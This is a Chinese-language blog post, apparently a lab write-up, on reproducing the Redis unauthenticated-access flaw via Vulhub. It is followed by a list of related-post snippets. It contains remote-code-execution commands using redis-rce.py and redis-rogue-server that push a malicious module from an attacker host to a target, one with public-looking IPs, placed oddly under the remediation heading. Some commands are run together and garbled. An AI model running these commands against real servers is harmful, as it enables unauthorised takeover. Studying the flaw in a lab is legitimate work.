漏洞复现-Redis
Redis
- CNNVD-201511-230 未授权访问
CNNVD-201511-230 未授权访问
一、漏洞描述
Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。
Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。
当程序没有开启认证选项端口对外开放时,攻击者可借助目标服务器访问权限利用该漏洞未授权访问 Redis 并读取 Redis 的数据,在服务器上写入公钥,进而使用对应的私钥直接登录目标服务器。
二、漏洞影响
Redis <= 5.0.5
三、漏洞复现
1、环境搭建
使用 Vulhub 在服务器上搭建:
cd /vulhub/redis/4-unacc docker-compose up -d 12
以开放在默认的 6379 端口,在攻击机使用redis-cli -h target-ip即可进行连接
2、漏洞复现
测试命令执行:
得到回显,可见存在未授权访问漏洞。
四、漏洞POC
使用 Redis 客户端连接:
redis-cli -h 0.0.0.0 1
执行info命令。
五、提权
https://blog.51cto.com/jiachen/2514921
https://www.cnblogs.com/zpchcbd/p/11739232.html
六、整改
https://blog.csdn.net/qq_40907977/article/details/106207488
https://blog.csdn.net/weixin_40412037/article/details/120347458
python3 redis-rce.py -r 115.29.67.37 -L 101.43.159.27 -f ./module.so
https://blog.csdn.net/Seizerz/article/details/103139905
https://www.cnblogs.com/1008612mrzou/p/14832260.html
redis-rogue-server
git clone https://github.com/n0b0dyCN/redis-rogue-server.gitcd redis-rogue-servepython3 redis-rogue-server.py --rhost 192.168.10.187 --lhost 192.168.10.1
https://mp.weixin.qq.com/s/xMOlwnU5Jac25GPNnpD8Hg
漏洞复现-Redis相关推荐
- redis 公网 安全_redis漏洞复现
一.漏洞简介 什么是redis redis是一个key-value存储系统.和Memcached类似,它支持存储的value类型相对更多,包括string(字符串).list(链表).set(集合). ...
- CVE-2022-0543:redis lua沙盒绕过命令执行漏洞复现
#Redis简介 Redis 全称 Remote Dictionary Server(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关 ...
- 漏洞检测与防御:Redis未授权访问漏洞复现
漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...
- Redis未授权访问漏洞复现与利用
1.漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果 ...
- Redis未授权访问漏洞复现
Redis介绍 redis是一个key-value存储系统.和Memcached类似,它支持存储的value类型相对更多,包括string(字符串).list(链表).set(集合).zset(sor ...
- 漏洞复现 - - - 未授权访问漏洞Redis
目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 编辑 ...
- Redis未授权访问漏洞复现(三种方式)
目录 利用无口令远程登陆redis 利用Redis的持久化写webshell 安装 复现 Redis 利用持久化,利用"公私钥"认证获取root权限 利用无口令远程登陆redis ...
- weblogic中ssrf漏洞修复_Weblogic-SSRF漏洞复现
0x00简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发.集成.部署和管理大型分 ...
- weblogic 漏洞复现
cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录sudo service docker start //启动docker服务docker-compose up - ...
最新文章
- cv_bridge中的编码模式与实现
- json数据在前端(javascript)和后端(php)转换
- latex中插入visio矢量图的方法
- 【Android开发】自定义ListView,使用通用适配器,并实现ListView上的每一项和每一项上的按钮等控件同时监听
- 基于Neutron的Kubernetes SDN实践经验之谈
- 已知坐标求方位角_由方位角高度角求赤经赤纬
- 基于MATLAB的turbo码代码,一种基于Simulink的Turbo码仿真实现
- Git部署远程仓库至github
- 深入理解 Java 内存模型
- html5 progress css,CSS内容:HTML5进度上的attr()不起作用
- vue导出Excel图片
- 在ArcCatalog10.2中改变元数据格式以及将元数据导出为HTML格式
- 如何在ROS中使用VScode创建功能包并编写cpp文件
- vue在日历中使用 tippyjs 来做悬浮弹框自定义插入html
- Nutch安装第四天,进入正题,Nutch2.4的配置和编译
- 『网络迷踪』ctfshow-网络迷踪(部分)
- CMOS图像传感器——深入ISO
- 如何注册全部DLL文件以及DLL简要说明
- java与模式孙悟空_由孙悟空的七十二变看Java设计模式:装饰者模式
- while it seems to fit format ‘yyyy-MM-dd‘T‘HH:mm:ss.SSSZ‘, parsing fails (leniency? null))